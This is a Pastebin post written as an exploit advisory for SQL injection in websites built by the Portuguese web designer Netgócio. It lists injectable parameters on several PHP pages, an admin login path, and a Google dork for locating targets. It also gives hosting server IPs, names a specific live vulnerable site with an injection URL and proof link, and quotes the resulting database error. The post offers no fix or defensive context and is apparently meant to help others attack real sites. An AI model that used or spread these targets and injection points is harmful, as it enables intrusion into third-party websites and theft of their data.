Advertisement
KingSkrupellos

Development Netgócio.pt ® Portugal Web Design SQL Injection

Jan 10th, 2019
155
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.84 KB | None | 0 0
  1. ############################################################
  2.  
  3. # Exploit Title : Development Netgócio.pt ® Portugal Web Design SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 11/01/2019
  7. # Vendor Homepage : netgocio.pt
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Google Dorks : inurl:''Development Netgócio ®'' site:pt
  12. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  13. Special Elements used in an SQL Command ('SQL Injection') ]
  14.  
  15. ############################################################
  16.  
  17. # Admin Panel Login Path :
  18. *************************
  19.  
  20. /area-reservada.php
  21.  
  22. # SQL Injection Exploit :
  23. ***********************
  24.  
  25. /comentarios.php?id=[SQL Injection]
  26.  
  27. /pedir_avaliacao.php?id=
  28.  
  29. /biblioteca-popup.php?id=[ID-NUMBER]&cat=
  30. [ID-NUMBER]&prod=[ID-NUMBER]&bib=[SQL Injection]
  31.  
  32. /biblioteca-popup.php?id=[ID-NUMBER]&cat=
  33. [ID-NUMBER]&prod=[SQL Injection]
  34.  
  35. /loja-online-retomas.php?id=[SQL Injection]
  36.  
  37. ############################################################
  38.  
  39. # Example Vulnerable Site :
  40. *************************
  41. Note : (185.2.4.101) => There are 691 domains hosted on this server.
  42.  
  43. Note : (94.126.168.68) => There are 245 domains hosted on this server.
  44.  
  45. [+] mobilitec.pt/comentarios.php?id=424%27 =>
  46.  
  47. [ Proof of Concept ] => archive.fo/UCtWZ
  48.  
  49. ############################################################
  50.  
  51. # SQL Database Error :
  52. **********************
  53.  
  54. You have an error in your SQL syntax; check the manual
  55. that corresponds to your MySQL server version for the
  56. right syntax to use near '1' ORDER BY id DESC' at line 1
  57.  
  58. ############################################################
  59.  
  60. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  61.  
  62. ############################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement